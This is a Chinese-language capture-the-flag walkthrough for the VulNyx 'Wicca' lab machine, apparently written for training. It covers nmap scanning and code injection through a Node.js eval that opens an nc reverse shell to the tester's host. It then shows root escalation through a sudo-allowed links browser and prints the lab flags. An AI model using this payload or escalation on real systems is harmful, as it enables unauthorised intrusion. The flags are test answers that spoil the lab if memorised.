Vlx_Wicca

靶机来源：https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 10:58 +0800
Nmap scan report for 192.168.2.1
Host is up (0.0012s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00066s latency).
MAC Address: 08:00:27:75:F0:11 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.53
Host is up (0.00071s latency).
MAC Address: 08:00:27:0C:6B:7C (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.63 seconds

靶机IP：192.168.2.53

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.53                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 10:58 +0800
Nmap scan report for 192.168.2.53
Host is up (0.00036s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5000/tcp open  upnp
MAC Address: 08:00:27:0C:6B:7C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.13 seconds

开放端口：22、80、5000

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,5000 192.168.2.53
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 10:59 +0800
Nmap scan report for 192.168.2.53
Host is up (0.0011s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 3a:dc:d6:1d:84:b6:96:c0:8f:96:1e:65:a0:24:0e:fb (ECDSA)
|_  256 de:93:17:fb:3a:19:9c:e0:17:32:2d:a9:73:f7:c5:94 (ED25519)
80/tcp   open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
5000/tcp open  http    Node.js (Express middleware)
|_http-title: VulNyx Lab
MAC Address: 08:00:27:0C:6B:7C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.47 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.53                         
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 11:00 +0800
Nmap scan report for 192.168.2.53
Host is up (0.00091s latency).
All 100 scanned ports on 192.168.2.53 are in ignored states.
Not shown: 57 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
MAC Address: 08:00:27:0C:6B:7C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 57.08 seconds

二、WEB渗透

1、80网站

访问80端口，是Apache的默认页面

2、5000端口-NodeJS

通过端口信息扫描，发现是Node.js (Express middleware)，访问5000端口

随便输入一个名字

尝试修改token为字母，出现报错

同时存在一个eval函数，尝试直接反弹shell

require('child_process').exec('nc -e /bin/bash 192.168.2.4 4444')

三、获取aleister权限

成功获取到shell

┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444                        
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.53] 35368
id
uid=1001(aleister) gid=1001(aleister) groups=1001(aleister)

稳定shell

/usr/bin/script -qc /bin/bash /dev/null
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

查看sudo -l

aleister@wicca:~$ sudo -l
Matching Defaults entries for aleister on wicca:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User aleister may run the following commands on wicca:
    (root) NOPASSWD: /usr/bin/links

/usr/bin/links可以直接读取文件，同时在file下存在os shell

点击可以直接获取到root权限

root@wicca:/home/aleister# id
uid=0(root) gid=0(root) groups=0(root)

五、查看FLAG

root@wicca:/home/aleister# cat /root/root.txt /home/aleister/user.txt 
VulNyx{dab686b0ee76b5edf6fc317c51d6f102}
VulNyx{d9f213df08ea2b3bf6cc90be28fa827f}